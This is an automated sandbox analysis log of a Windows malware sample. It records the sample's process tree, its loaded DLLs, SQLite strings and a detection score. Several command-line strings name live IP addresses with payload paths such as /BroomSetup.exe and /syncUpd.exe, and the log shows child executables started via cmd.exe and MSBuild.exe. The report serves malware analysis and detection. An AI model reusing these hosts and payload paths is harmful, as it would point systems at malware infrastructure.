Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: @	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: Installed	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: Installed	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /1/Package.zip	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .zip	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .zip	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: \run.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: \run.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /BroomSetup.exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_04164C75
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_04164C75

Source: VucRf0jboS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5qk.0.exe, 00000001.00000002.2560996060.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2531006330.000000001E779000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: VucRf0jboS.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File read: C:\Users\user\Desktop\VucRf0jboS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VucRf0jboS.exe "C:\Users\user\Desktop\VucRf0jboS.exe"
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe"
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe"
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe "C:\Users\user\AppData\Local\Temp\u5qk.0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Process created: C:\Users\user\AppData\Local\Temp\u5qk.3.exe "C:\Users\user\AppData\Local\Temp\u5qk.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winshfhc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: oleacc.dll	Jump to behavior
